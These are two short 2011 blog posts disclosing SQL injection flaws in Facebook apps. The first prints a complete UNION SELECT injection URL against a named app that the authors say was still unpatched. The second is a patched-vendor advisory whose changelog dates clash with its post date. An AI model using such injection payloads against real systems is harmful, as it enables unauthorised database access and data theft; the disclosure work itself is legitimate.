Monday, March 21, 2011

Another vulnerability in facebook apps!

This is second sql injection we found in facebook apps.

We tried to contact developers but got no response from them. So we decided to release the vulnerability.

Note:: There are few more facebook apps which we found are vulnerable to sql injection attacks. We are waiting for the developers to patch those. We will post them as soon as they are patched.

A Proof Of Concept of the vulnerability can be seen at::

http://apps.facebook.com/lucygames/game.php?gameid=-123%20UNION%20SELECT%20null,%28select%20concat%280x3a,unhex%28Hex%28cast%28group_concat%28table_name%29%20as%20char%29%29%29,0x3a%29%20FROM%20information_schema.tables%20Where%20table_schema=0x6C75637967616D6573%29,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--

Wednesday, March 9, 2011

Sql Injection in Facebook applications!

We found a vulnerability in 2 facebook applications. One is patched now so we are disclosing the vulnerability.


There was a SQL Injection vulnerability in apps.facebook.com

Vendor::twmarketplace
Location:: http://apps.facebook.com/twmarketplace/post.php?postid=
Severity:: Critical
Impact:: Database access/server control


It was possible to extract all data of all databases located on that servers


Changelog::
7/3/2010 - Facebook vendors notified
8/3/2010 - Response from verdor
8/3/2010 - Vendor patched the vulnerability
9/3/2010 - Public disclosure